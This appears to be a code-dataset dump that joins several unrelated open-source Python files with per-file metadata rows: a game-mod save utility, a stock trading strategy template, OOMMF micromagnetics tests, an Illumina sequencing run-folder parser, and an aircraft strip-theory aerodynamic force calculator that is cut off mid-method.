def __exit__(self, exc_type, exc_value, traceback):
self.disable()
def __call__(self, func):
@wraps(func)
def inner(*args, **kwargs):
with self:
return func(*args, **kwargs)
return inner
def enable(self):
override = UserSettingsHolder(settings._wrapped)
for key, new_value in self.options.items():
setattr(override, key, new_value)
settings._wrapped = override
def disable(self):
settings._wrapped = self.wrapped
| gpl-3.0 | -2,958,675,292,093,917,000 | 27.755556 | 78 | 0.646832 | false | 4.386441 | false | false | false |
viswimmer1/PythonGenerator | data/python_files/33345232/save_utils.py | 1 | 3968 | import os
from zipfile import ZipFile
from itertools import izip_longest
from django.conf import settings
from utils import save_to_file, save_to_zip, set_header, get_diff
from apps.weapon.models import Weapon, ECM, Sensor, Repair, Construction, Brain, WeaponSound
from apps.structure.models import Structure, StructureDefence, StructureWeapon, BodyDefence, Feature
from apps.function.models import StructureFunction, Function
from apps.body.models import Body, Propulsion, PropulsionSound, PropulsionType, BodyPropulsion
from apps.templates.models import Template, TemplateWeapon
from apps.research.models import (Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1,
ResearchStructure_Cam1, ResultComponent_Cam1,
ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2,
ResearchStructure_Cam2, ResultComponent_Cam2,
ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3,
ResearchStructure_Cam3, ResultComponent_Cam3,
ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer,
ResearchStructure_Multiplayer, ResultComponent_Multiplayer,
ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer)
classes = [
Weapon,
Feature,
Construction,
Structure,
StructureFunction,
Body,
Propulsion,
PropulsionSound,
PropulsionType,
StructureDefence,
StructureWeapon,
Function,
BodyDefence,
ECM,
Sensor,
Repair,
BodyPropulsion,
Brain,
WeaponSound,
Template,
TemplateWeapon,
Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1,
ResearchStructure_Cam1, ResultComponent_Cam1,
ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2,
ResearchStructure_Cam2, ResultComponent_Cam2,
ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3,
ResearchStructure_Cam3, ResultComponent_Cam3,
ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer,
ResearchStructure_Multiplayer, ResultComponent_Multiplayer,
ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer
]
classes = [x for x in classes if x.objects.count()]
def save_all():
[set_header(x) for x in classes if not x.load_from_first]
texts = [cls.get_data() for cls in classes]
diffs = [get_diff(cls, text) for cls, text in zip(classes, texts)]
if settings.MOD_SOURCE:
[save_to_file(cls, text) for cls, text in zip(classes, texts)]
else:
zf = ZipFile(settings.PATH_TO_MOD)
names = set(zf.namelist()) - set([x.FILE_PATH for x in classes])
data = [(path, zf.read(path)) for path in names]
zf.close()
zf = ZipFile(settings.PATH_TO_MOD, 'w')
[save_to_zip(cls, zf, text) for cls, text in zip(classes, texts)]
[zf.writestr(file, text) for file, text in data]
zf.close()
return diffs
def save_xml():
'does not work with archive'
texts = [cls.get_xml() for cls in classes]
[save_to_file(cls, text, format='xml') for cls, text in zip(classes, texts)]
return [['Saved to XML', [('green', 'ok')]]]
| gpl-2.0 | 3,776,653,706,209,634,300 | 46.238095 | 212 | 0.715222 | false | 3.830116 | false | false | false |
chandinijain/Auquan-Toolbox | TradingStrategyTemplate.py | 1 | 3670 | from __future__ import absolute_import, division, print_function, unicode_literals
import pandas as pd
import numpy as np
from pythonToolbox.toolbox import backtest
def settings():
exchange = "stocks" # Exchange to download data for (nyse or nasdaq)
markets = ['A','AAPL','IBM','GOOG','C']
# Stocks to download data for.
# Leave blank to download all stocks for the exchange (~900 stocks)
date_start = '2015-01-03' # Date to start the backtest
date_end = '2016-11-06' # Date to end the backtest
lookback = 120 # Number of days you want historical data for
""" To make a decision for day t, your algorithm will have historical data
from t-lookback to t-1 days"""
return [exchange, markets, date_start, date_end, lookback]
def trading_strategy(lookback_data):
"""
:param lookback_data: Historical Data for the past "lookback" number of days as set in the main settings.
It is a dictionary of features such as,
'OPEN', 'CLOSE', 'HIGH', 'LOW', 'VOLUME', 'SLIPPAGE', 'POSITION', 'ORDER',
'FILLED_ORDER', 'DAILY_PNL', 'TOTAL_PNL', 'FUNDS', 'VALUE'
Any feature data can be accessed as:lookback_data['OPEN']
The output is a pandas dataframe with dates as the index (row)
and markets as columns.
""""""""""""""""""""""""""
""""""""""""""""""""""""""
To see a complete list of features, uncomment the line below"""
#print(lookback_data.keys())
"""""""""""""""""""""""""""
:return: A pandas dataframe with markets you are trading as index(row) and
signal, price and quantity as columns
order['SIGNAL']:buy (+1), hold (0) or sell (-1) trading signals for all securities in markets[]
order['PRICE']: The price where you want to trade each security. Buy orders are executed at or below the price and sell orders are executed at or above the price
order['QUANTITY']: The quantity of each stock you want to trade.
System will buy the specified quantity of stock if it's price <= price specified here
System will sell the specified quantity of a stock if it's price >= price specified here
"""
"""IMPORTANT: Please make sure you have enough funds to buy or sell.
Order is cancelled if order_value > available funds(both buy and short sell)"""
order = pd.DataFrame(0, index=lookback_data['POSITION'].columns, columns = ['SIGNAL','WEIGHTS','PRICE'])
##YOUR CODE HERE
period1 = 120
period2 = 30
markets_close = lookback_data['CLOSE']
market_open = lookback_data['OPEN']
avg_p1 = markets_close[-period1 : ].sum() / period1
avg_p2 = markets_close[-period2 : ].sum() / period2
sdev_p1 = np.std(markets_close[-period1 : ], axis=0)
difference = avg_p1 - avg_p2
deviation = pd.Series(0, index=lookback_data['POSITION'].columns)
criteria_1 = np.abs(difference)>sdev_p1
criteria_2 = np.sign(difference) == np.sign(lookback_data['POSITION'])
deviation[criteria_1] = difference
deviation[criteria_2] = difference
total_deviation = np.absolute(deviation).sum()
if total_deviation==0:
return order
else:
order['WEIGHTS']= np.absolute(deviation/total_deviation)
order['SIGNAL'] = np.sign(deviation)
# order['PRICE'][order['SIGNAL']>0] = (avg_p1-sdev_p1)[order['SIGNAL']>0]
# order['PRICE'][order['SIGNAL']<0] = (avg_p1+sdev_p1)[order['SIGNAL']<0]
return order
if __name__ == '__main__':
[exchange, markets, date_start, date_end, lookback] = settings()
backtest(exchange, markets, trading_strategy, date_start, date_end, lookback)#,verbose=True)
| mit | -4,952,343,690,289,032,000 | 44.308642 | 165 | 0.644687 | false | 3.532243 | false | false | false |
ryanpepper/oommf-python | vision/oommf/test_oommf.py | 2 | 1514 | import pytest
def test_oommf_sim():
import oommf
import os.path
oommf.path = "/home/vagrant/oommf-python/oommf/oommf/"
Py = oommf.materials.permalloy
my_geometry = oommf.geometry.Cuboid(
(0, 0, 0), (30, 30, 100), unitlength=1e-9)
sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=Py)
sim.m = [1, 1, 0]
assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.'
sim.advance_time(1e-9)
assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.\n\tCurrent t = 1e-09s'
assert os.path.isfile('Simulation_0.0_1e-09.mif')
os.system('rm Simulation_0.0_1e-09.mif')
@pytest.mark.xfail
def test_mif_assemble():
import oommf
import oommf.mifgen
NiFe = oommf.materials.NiFe
my_geometry = oommf.geometry.Cuboid(
(0, 0, 0), (310, 310, 40), unitlength=1e-9)
sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=NiFe)
mifpath = oommf.mifgen._assemble_mif(sim)
f = open(mifpath, 'r')
f2 = open('oommf.oommfpath' + '/app/oxs/examples/square.mif')
constructed_miffile = f.read()
read_miffile = f2.read()
assert constructed_miffile == read_miffile
def test_material():
import oommf.materials
assert str(oommf.materials.permalloy) == 'Py(Fe80Ni20)'
assert oommf.materials.permalloy.A == 13e-12
| bsd-2-clause | 7,453,137,607,101,006,000 | 38.842105 | 184 | 0.638045 | false | 2.544538 | false | false | false |
kate-v-stepanova/flowcell_parser | flowcell_parser/classes.py | 1 | 18602 |
import re
import os
import csv
import xml.etree.ElementTree as ET
import logging
import glob
from datetime import datetime
from collections import OrderedDict
from bs4 import BeautifulSoup #html parser
class RunParser(object):
"""Parses an Illumina run folder. It generates data for statusdb
notable attributes :
:RunInfoParser runinfo: see RunInfo
:RunParametersParser runparameters: see RunParametersParser
:SampleSheetParser samplesheet: see SampleSheetParser
:LaneBarcodeParser lanebarcodes: see LaneBarcodeParser
"""
def __init__(self, path):
if os.path.exists(path):
self.log=logging.getLogger(__name__)
self.path=path
self.parse()
self.create_db_obj()
else:
raise os.error(" flowcell cannot be found at {0}".format(path))
def parse(self, demultiplexingDir='Demultiplexing'):
"""Tries to parse as many files as possible from a run folder"""
fc_name=os.path.basename(os.path.abspath(self.path)).split('_')[-1][1:]
rinfo_path=os.path.join(self.path, 'RunInfo.xml')
rpar_path=os.path.join(self.path, 'runParameters.xml')
ss_path=os.path.join(self.path, 'SampleSheet.csv')
lb_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'laneBarcode.html')
ln_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'lane.html')
undeterminedStatsFolder = os.path.join(self.path, demultiplexingDir, "Stats")
cycle_times_log = os.path.join(self.path, 'Logs', "CycleTimes.txt")
try:
self.runinfo=RunInfoParser(rinfo_path)
except OSError as e:
self.log.info(str(e))
self.runinfo=None
try:
self.runparameters=RunParametersParser(rpar_path)
except OSError as e:
self.log.info(str(e))
self.runParameters=None
try:
self.samplesheet=SampleSheetParser(ss_path)
except OSError as e:
self.log.info(str(e))
self.samplesheet=None
try:
self.lanebarcodes=LaneBarcodeParser(lb_path)
except OSError as e:
self.log.info(str(e))
self.lanebarcodes=None
try:
self.lanes=LaneBarcodeParser(ln_path)
except OSError as e:
self.log.info(str(e))
self.lanes=None
try:
self.undet=DemuxSummaryParser(undeterminedStatsFolder)
except OSError as e:
self.log.info(str(e))
self.undet=None
try:
self.time_cycles = CycleTimesParser(cycle_times_log)
except OSError as e:
self.log.info(str(e))
self.time_cycles = None
def create_db_obj(self):
self.obj={}
bits=os.path.basename(os.path.abspath(self.path)).split('_')
name="{0}_{1}".format(bits[0], bits[-1])
self.obj['name']=name
if self.runinfo:
self.obj['RunInfo']=self.runinfo.data
if self.runinfo.recipe:
self.obj['run_setup']=self.runinfo.recipe
if self.runparameters:
self.obj.update(self.runparameters.data)
if self.runparameters.recipe:
self.obj['run_setup']=self.runparameters.recipe
if self.samplesheet:
self.obj['samplesheet_csv']=self.samplesheet.data
if self.lanebarcodes:
self.obj['illumina']={}
self.obj['illumina']['Demultiplex_Stats']={}
self.obj['illumina']['Demultiplex_Stats']['Barcode_lane_statistics']=self.lanebarcodes.sample_data
self.obj['illumina']['Demultiplex_Stats']['Flowcell_stats']=self.lanebarcodes.flowcell_data
if self.lanes:
self.obj['illumina']['Demultiplex_Stats']['Lanes_stats']=self.lanes.sample_data
if self.undet:
self.obj['Undetermined']=self.undet.result
if self.time_cycles:
self.obj['time cycles'] = self.time_cycles
class DemuxSummaryParser(object):
def __init__(self, path):
if os.path.exists(path):
self.path=path
self.result={}
self.TOTAL = {}
self.parse()
else:
raise os.error("DemuxSummary folder {0} cannot be found".format(path))
def parse(self):
#will only save the 50 more frequent indexes
pattern=re.compile('DemuxSummaryF1L([0-9]).txt')
for file in glob.glob(os.path.join(self.path, 'DemuxSummaryF1L?.txt')):
lane_nb = pattern.search(file).group(1)
self.result[lane_nb]=OrderedDict()
self.TOTAL[lane_nb] = 0
with open(file, 'rU') as f:
undeterminePart = False
for line in f:
if not undeterminePart:
if "### Columns:" in line:
undeterminePart = True
else:
#it means I am readng the index_Sequence Hit_Count
components = line.rstrip().split('\t')
if len(self.result[lane_nb].keys())< 50:
self.result[lane_nb][components[0]] = int(components[1])
self.TOTAL[lane_nb] += int(components[1])
class LaneBarcodeParser(object):
def __init__(self, path ):
if os.path.exists(path):
self.path=path
self.parse()
else:
raise os.error(" laneBarcode.html cannot be found at {0}".format(path))
def parse(self):
self.sample_data=[]
self.flowcell_data={}
with open(self.path, 'rU') as htmlfile:
bsoup=BeautifulSoup(htmlfile)
flowcell_table=bsoup.find_all('table')[1]
lane_table=bsoup.find_all('table')[2]
keys=[]
values=[]
for th in flowcell_table.find_all('th'):
keys.append(th.text)
for td in flowcell_table.find_all('td'):
values.append(td.text)
self.flowcell_data = dict(zip(keys, values))
keys=[]
rows=lane_table.find_all('tr')
for row in rows[0:]:
if len(row.find_all('th')):
#this is the header row
for th in row.find_all('th'):
key=th.text.replace('<br/>', ' ').replace('>', '>')
keys.append(key)
elif len(row.find_all('td')):
values=[]
for td in row.find_all('td'):
values.append(td.text)
d=dict(zip(keys,values))
self.sample_data.append(d)
class DemultiplexingStatsParser(object):
def __init__(self, path ):
if os.path.exists(path):
self.path=path
self.parse()
else:
raise os.error(" DemultiplexingStats.xml cannot be found at {0}".format(path))
def parse(self):
data={}
tree=ET.parse(self.path)
root = tree.getroot()
self.data=xml_to_dict(root)
class SampleSheetParser(object):
"""Parses Samplesheets, with their fake csv format.
Should be instancied with the samplesheet path as an argument.
.header : a dict containing the info located under the [Header] section
.settings : a dict containing the data from the [Settings] section
.reads : a list of the values in the [Reads] section
.data : a list of the values under the [Data] section. These values are stored in a dict format
.datafields : a list of field names for the data section"""
def __init__(self, path ):
self.log=logging.getLogger(__name__)
if os.path.exists(path):
self.parse(path)
else:
raise os.error(" sample sheet cannot be found at {0}".format(path))
def generate_clean_samplesheet(self, fields_to_remove=None, rename_samples=True, rename_qPCR_suffix = False, fields_qPCR= None):
"""Will generate a 'clean' samplesheet, : the given fields will be removed. if rename_samples is True, samples prepended with 'Sample_'
are renamed to match the sample name"""
output=""
if not fields_to_remove:
fields_to_remove=[]
#Header
output+="[Header]{}".format(os.linesep)
for field in self.header:
output+="{},{}".format(field.rstrip(), self.header[field].rstrip())
output+=os.linesep
#Data
output+="[Data]{}".format(os.linesep)
datafields=[]
for field in self.datafields:
if field not in fields_to_remove:
datafields.append(field)
output+=",".join(datafields)
output+=os.linesep
for line in self.data:
line_ar=[]
for field in datafields:
value = line[field]
if rename_samples and 'SampleID' in field :
try:
if rename_qPCR_suffix and 'SampleName' in fields_qPCR:
#substitute SampleID with SampleName, add Sample_ as prefix and remove __qPCR_ suffix
value =re.sub('__qPCR_$', '', 'Sample_{}'.format(line['SampleName']))
else:
#substitute SampleID with SampleName, add Sample_ as prefix
value ='Sample_{}'.format(line['SampleName'])
except:
#otherwise add Sample_ as prefix
value = 'Sample_{}'.format(line['SampleID'])
elif rename_qPCR_suffix and field in fields_qPCR:
value = re.sub('__qPCR_$', '', line[field])
line_ar.append(value)
output+=",".join(line_ar)
output+=os.linesep
return output
def parse(self, path):
flag=None
header={}
reads=[]
settings=[]
csvlines=[]
data=[]
flag= 'data' #in case of HiSeq samplesheet only data section is present
with open(path, 'rU') as csvfile:
for line in csvfile.readlines():
if '[Header]' in line:
flag='HEADER'
elif '[Reads]' in line:
flag='READS'
elif '[Settings]' in line:
flag='SETTINGS'
elif '[Data]' in line:
flag='data'
else:
if flag == 'HEADER':
try:
header[line.split(',')[0]]=line.split(',')[1]
except IndexError as e:
self.log.error("file {} does not seem to be comma separated.".format(path))
raise RunTimeError("Could not parse the samplesheet, does not seem to be comma separated")
elif flag == 'READS':
reads.append(line.split(',')[0])
elif flag == 'SETTINGS':
settings.append(line.split(',')[0])
elif flag == 'data':
csvlines.append(line)
reader = csv.DictReader(csvlines)
for row in reader:
linedict={}
for field in reader.fieldnames:
linedict[field]=row[field]
data.append(linedict)
self.datafields=reader.fieldnames
self.data=data
self.settings=settings
self.header=header
self.reads=reads
class RunInfoParser(object):
"""Parses RunInfo.xml.
Should be instancied with the file path as an argument.
.data : a list of hand-picked values :
-Run ID
-Run Number
-Instrument
-Flowcell name
-Run Date
-Reads metadata
-Flowcell layout
"""
def __init__(self, path ):
self.data={}
self.recipe=None
self.path=path
if os.path.exists(path):
self.parse()
else:
raise os.error(" run info cannot be found at {0}".format(path))
def parse(self):
data={}
tree=ET.parse(self.path)
root = tree.getroot()
run=root.find('Run')
data['Id']=run.get('Id')
data['Number']=run.get('Number')
data['Instrument']=run.find('Instrument').text
data['Flowcell']=run.find('Flowcell').text
data['Date']=run.find('Date').text
data['Reads']=[]
for read in run.find('Reads').findall('Read'):
data['Reads'].append(read.attrib)
layout=run.find('FlowcellLayout')
data['FlowcellLayout']=layout.attrib
self.data=data
self.recipe=make_run_recipe(self.data.get('Reads', {}))
def get_read_configuration(self):
"""return a list of dicts containig the Read Configuration
"""
readConfig = []
try:
readConfig = self.data['Reads']
return sorted(readConfig, key=lambda r: int(r.get("Number", 0)))
except IOError:
raise RuntimeError('Reads section not present in RunInfo. Check the FC folder.')
class RunParametersParser(object):
"""Parses a runParameters.xml file.
This is a much more general xml parser, it will build a dict from the xml data.
Attributes might be replaced if children nodes have the same tag as the attributes
This does not happen in the current xml file, but if you're planning to reuse this, it may be of interest.
"""
def __init__(self, path ):
self.data={}
self.recipe=None
self.path=path
if os.path.exists(path):
self.parse()
else:
raise os.error(" run parameters cannot be found at {0}".format(path))
def parse(self):
data={}
tree=ET.parse(self.path)
root = tree.getroot()
self.data=xml_to_dict(root)
self.recipe=make_run_recipe(self.data.get('Setup', {}).get('Reads', {}).get('Read', {}))
def make_run_recipe(reads):
"""Based on either runParameters of RunInfo, gathers the information as to how many
readings are done and their length, e.g. 2x150"""
nb_reads=0
nb_indexed_reads=0
numCycles=0
for read in reads:
nb_reads+=1
if read['IsIndexedRead'] == 'Y':
nb_indexed_reads+=1
else:
if numCycles and numCycles != read['NumCycles']:
logging.warn("NumCycles in not coherent")
else:
numCycles = read['NumCycles']
if reads:
return "{0}x{1}".format(nb_reads-nb_indexed_reads, numCycles)
return None
def xml_to_dict(root):
current=None
children=list(root)
if children:
current={}
duplicates={}
for child in children:
if len(root.findall(child.tag))>1:
if child.tag not in duplicates:
duplicates[child.tag]=[]
lower=xml_to_dict(child)
duplicates[child.tag].extend(lower.values())
current.update(duplicates)
else:
lower=xml_to_dict(child)
current.update(lower)
if root.attrib:
if current:
if [x in current for x in root.attrib]:
current.update(root.attrib)
else:
current.update({'attribs':root.attribs})
else:
current= root.attrib
if root.text and root.text.strip() != "":
if current:
if 'text' not in current:
current['text']=root.text
else:
#you're really pushing here, pal
current['xml_text']=root.text
else:
current=root.text
return {root.tag:current}
class CycleTimesParser(object):
def __init__(self, path):
if os.path.exists(path):
self.path = path
self.cycles = []
self.parse()
else:
raise os.error("file {0} cannot be found".format(path))
def parse(self):
"""
parse CycleTimes.txt and return ordered list of cycles
CycleTimes.txt contains records: <date> <time> <barcode> <cycle> <info>
one cycle contains a few records (defined by <cycle>)
parser goes over records and saves the first record of each cycle as start time
and the last record of each cycle as end time
"""
data = []
date_format = '%m/%d/%Y-%H:%M:%S.%f'
with open(self.path, 'r') as file:
cycle_times = file.readlines()
# if file is empty, return
if not cycle_times:
return
# first line is header, don't read it
for cycle_line in cycle_times[1:]:
# split line into strings
cycle_list = cycle_line.split()
cycle_time_obj = {}
# parse datetime
cycle_time_obj['datetime'] = datetime.strptime("{date}-{time}".format(date=cycle_list[0], time=cycle_list[1]), date_format)
# parse cycle number
cycle_time_obj['cycle'] = int(cycle_list[3])
# add object in the list
data.append(cycle_time_obj)
# take the first record as current cycle
current_cycle = {
'cycle_number': data[0]['cycle'],
'start': data[0]['datetime'],
'end': data[0]['datetime']
}
# compare each record with current cycle (except the first one)
for record in data[1:]:
# if we are at the same cycle
if record['cycle'] == current_cycle['cycle_number']:
# override end of cycle with current record
current_cycle['end'] = record['datetime']
# if a new cycle starts
else:
# save previous cycle
self.cycles.append(current_cycle)
# initialize new current_cycle
current_cycle = {
'cycle_number': record['cycle'],
'start': record['datetime'],
'end': record['datetime']
}
# the last records is not saved inside the loop
if current_cycle not in self.cycles:
self.cycles.append(current_cycle) | mit | -6,675,619,845,388,132,000 | 34.982592 | 143 | 0.538921 | false | 4.150379 | false | false | false |
seanny1986/Aerodynamic-Strip-Theory | Aero Strip Theory/forcecalc.py | 1 | 21505 | from __future__ import print_function
import numpy as np
class forcecalc(object):
def __init__(self):
pass
##################--SETTERS--##################
def setsolverparams(self,
timestep,
udot,
vdot,
wdot,
pdot,
qdot,
rdot,
steps,
rho,
g):
# leapfrog integrator solver vars
self.timestep_ = timestep
self.udot_ = udot
self.vdot_ = vdot
self.wdot_ = wdot
self.pdot_ = pdot
self.qdot_ = qdot
self.rdot_ = rdot
# strip theory solver parameters
self.steps_ = steps
self.rho_ = rho
self.g_ = g
# set u value surface parameters
def setuvals( self,
U2Xvals,
U2Yvals,
U2Zvals,
U2func):
self.U2Xvals_ = U2Xvals
self.U2Yvals_ = U2Yvals
self.U2Zvals_ = U2Zvals
self.U2func_ = U2func
# set aircraft parameters
def setacparams(self,
m,
Ixx,
Iyy,
Izz,
proprad,
fuserad,
x_cg,
CD0_b,
dCDb_dB,
dCDb_dA,
alphamin,
alphamax):
self.m_ = m
self.Ixx_ = Ixx
self.Iyy_ = Iyy
self.Izz_ = Izz
# fuselage geometry
self.proprad_ = proprad
self.fuserad_ = fuserad
self.x_cg_ = x_cg
# fuselage drag values
self.CD0_b_ = CD0_b
self.dCDb_dB_ = dCDb_dB
self.dCDb_dA_ = dCDb_dA
# stall points
self.alphamin_ = alphamin*np.pi/180
self.alphamax_ = alphamax*np.pi/180
# set wing geometry
def setwingparams( self,
wspan,
winc,
rc_w,
tc_w,
qtc_sweep_w,
wing_root_le_x,
dCL_da_w,
dCL_de_w,
CL0_w,
CD0_w,
Y_w,
y_w,
e_w):
self.wspan_ = wspan
self.winc_ = winc*np.pi/180
self.rc_w_ = rc_w
self.tc_w_ = tc_w
self.qtc_sweep_w_ = qtc_sweep_w*np.pi/180
self.wing_root_le_x_ = wing_root_le_x
# wing lift curve slope values
self.dCL_da_w_ = dCL_da_w
self.dCL_de_w_ = dCL_de_w
self.CL0_w_ = CL0_w
self.CD0_w_ = CD0_w
# wing control surface y placement (start and end)'
self.Y_w_ = Y_w
self.y_w_ = y_w
# oswald efficiency factor wing'
self.e_w_ = e_w
# set horizontal tail geometry
def sethtailparams( self,
htspan,
htinc,
rc_ht,
tc_ht,
qtc_sweep_ht,
htail_root_le_x,
dCL_da_ht,
dCL_de_ht,
CL0_ht,
CD0_ht,
Y_ht,
y_ht,
e_ht):
self.htspan_ = htspan
self.htinc_ = htinc*np.pi/180
self.rc_ht_ = rc_ht
self.tc_ht_ = tc_ht
self.qtc_sweep_ht_ = qtc_sweep_ht*np.pi/180
self.htail_root_le_x_ = htail_root_le_x
# horizontal tailplane lift-curve slope values
self.dCL_da_ht_ = dCL_da_ht
self.dCL_de_ht_ = dCL_de_ht
self.CL0_ht_ = CL0_ht
self.CD0_ht_ = CD0_ht
# htail control surface y placement (start and end)
self.Y_ht_ = Y_ht
self.y_ht_ = y_ht
# oswald efficiency factor htail
self.e_ht_ = e_ht
# set vertical tail geometry
def setvtailparams( self,
vtspan,
vtinc,
rc_vt,
tc_vt,
qtc_sweep_vt,
vtail_root_le_x,
dCL_da_vt,
dCL_de_vt,
CL0_vt,
CD0_vt,
Y_vt,
y_vt,
e_vt):
self.vtspan_ = vtspan
self.vtinc_ = vtinc*np.pi/180
self.rc_vt_ = rc_vt
self.tc_vt_ = tc_vt
self.qtc_sweep_vt_ = qtc_sweep_vt*np.pi/180
self.vtail_root_le_x_ = vtail_root_le_x
# wing lift curve slope values
self.dCL_da_vt_ = dCL_da_vt
self.dCL_de_vt_ = dCL_de_vt
self.CL0_vt_ = CL0_vt
self.CD0_vt_ = CD0_vt
# wing control surface y placement (start and end)
self.Y_vt_ = Y_vt
self.y_vt_ = y_vt
# oswald efficiency factor wing
self.e_vt_ = e_vt
#build wing geometry
def buildwing(self):
span = self.wspan_
rc = self.rc_w_
tc = self.tc_w_
steps = self.steps_
rootx = self.wing_root_le_x_
self.b_w_ = span/2
self.cbar_w_ = (rc+tc)/2
self.Sref_w_ = self.cbar_w_*span
self.AR_w_ = span**2/self.Sref_w_
self.w_el_ = self.b_w_/steps
self.wing_ = np.linspace(self.w_el_/2, (span-self.w_el_)/2, steps)
self.chord_w_ = self.chord(self.wing_, span, self.Sref_w_, rc, tc)
self.le_sweep_w_ = np.arctan2((self.b_w_*np.tan(self.qtc_sweep_w_)+0.25*(rc-tc)), self.b_w_)
self.x_ac_w_ = rootx+0.25*self.chord_w_+np.multiply(np.tan(self.le_sweep_w_), self.wing_)
# build horizontal tail geometry
def buildhoztail(self):
span = self.htspan_
rc = self.rc_ht_
tc = self.tc_ht_
steps = self.steps_
rootx = self.htail_root_le_x_
self.b_ht_ = span/2
self.cbar_ht_ = (rc+tc)/2
self.Sref_ht_ = self.cbar_ht_*span
self.AR_ht_ = span**2/self.Sref_ht_
self.ht_el_ = self.b_ht_/steps
self.htail_ = np.linspace(self.ht_el_/2, (span-self.ht_el_)/2, steps)
self.chord_ht_ = self.chord(self.htail_, span, self.Sref_ht_, rc, tc)
self.le_sweep_ht_ = np.arctan2((self.b_ht_*np.tan(self.qtc_sweep_ht_)+0.25*(rc-tc)), self.b_ht_)
self.x_ac_ht_ = rootx+0.25*self.chord_ht_+np.multiply(np.tan(self.le_sweep_ht_), self.htail_)
# build vertical tail geometry
def buildvertail(self):
span = self.vtspan_
rc = self.rc_vt_
tc = self.tc_vt_
steps = self.steps_
rootx = self.vtail_root_le_x_
self.cbar_vt_ = (rc+tc)/2
self.Sref_vt_ = self.cbar_vt_*span
self.AR_vt_ = span**2/self.Sref_vt_
self.vt_el_ = span/steps
self.vtail_ = np.linspace(self.vt_el_/2, (span-self.vt_el_)/2, steps)
self.chord_vt_ = self.chord(self.vtail_, span, self.Sref_vt_, rc, tc)
self.le_sweep_vt_ = np.arctan2((span*np.tan(self.qtc_sweep_vt_)+0.25*(rc-tc)), span)
self.x_ac_vt_ = rootx+0.25*self.chord_vt_+np.multiply(np.tan(self.le_sweep_vt_), self.vtail_)
# build fuselage and prop geometry
def buildfuseandprop(self):
self.A_b_ref_ = np.pi*self.fuserad_**2
self.diskA_ = np.pi*self.proprad_**2
# build aircraft geometry to be used for forcecalc
def buildgeom(self):
self.buildwing()
self.buildhoztail()
self.buildvertail()
self.buildfuseandprop()
# calculate body forces acting on the aircraft using strip theory
def forcecalc( self,
power,
u,
v,
w,
p,
q,
r,
aileron,
elevator,
rudder):
# calc thrust force
thrust = self.thrustcalc(power, u)
# creating left and right wings to keep axes consistent
lw = -np.flip(self.wing_, 0)
rw = self.wing_
# calc local velocity components for each strip on the wing (u,v,w)
u_w_lw = u+lw*r
u_w_rw = u+rw*r
v_w = v*np.ones(np.size(rw))
w_w_lw = w+p*lw-q*(self.x_cg_-self.x_ac_w_)
w_w_rw = w+p*rw-q*(self.x_cg_-self.x_ac_w_)
# calc local velocity components for each strip on the horizontal tail (u,v,w)'
lht = -np.flip(self.htail_, 0)
rht = self.htail_
u_ht_lht = u+lht*r
u_ht_rht = u+rht*r
v_ht = v-r*(self.x_cg_-self.x_ac_ht_)
w_ht_lht = w+p*lht-q*(self.x_cg_-self.x_ac_ht_)
w_ht_rht = w+p*rht-q*(self.x_cg_-self.x_ac_ht_)
# calc local velocity components for each strip on the vertical tail (u,v,w)
u_vt = u-self.vtail_*q
v_vt = v+p*self.vtail_-r*(self.x_cg_-self.x_ac_vt_)
w_vt = w-q*(self.x_cg_-self.x_ac_vt_)
# calc local local angles of attack for each strip on the wings, ht, vt, including wing incidence
alpha_lw = np.arctan2(w_w_lw, u_w_lw)+self.winc_*np.pi/180
alpha_rw = np.arctan2(w_w_rw, u_w_rw)+self.winc_*np.pi/180
alpha_lht = np.arctan2(w_ht_lht, u_ht_lht)+self.htinc_*np.pi/180
alpha_rht = np.arctan2(w_ht_rht, u_ht_rht)+self.htinc_*np.pi/180
alpha_vt = np.arcsin(v_vt/np.sqrt(u_vt**2+v_vt**2+w_vt**2))
# calc local local lift coefficients for each strip on the wings, ht, vt
CL_lw = self.CL(lw, self.dCL_da_w_, alpha_lw, self.CL0_w_, -aileron, self.dCL_de_w_, -self.Y_w_, -self.y_w_)
CL_rw = self.CL(rw, self.dCL_da_w_, alpha_rw, self.CL0_w_, aileron, self.dCL_de_w_, self.Y_w_, self.y_w_)
CL_lht = self.CL(lht, self.dCL_da_ht_, alpha_lht, self.CL0_ht_, elevator, self.dCL_de_ht_, self.Y_ht_, self.y_ht_)
CL_rht = self.CL(rht, self.dCL_da_ht_, alpha_rht, self.CL0_ht_, elevator, self.dCL_de_ht_, self.Y_ht_, self.y_ht_)
CL_vt = self.CL(self.vtail_, self.dCL_da_vt_, alpha_vt, self.CL0_vt_, rudder, self.dCL_de_vt_, self.Y_vt_, self.y_vt_)
# calc local local moment coefficients for each strip on the wings, ht, vt
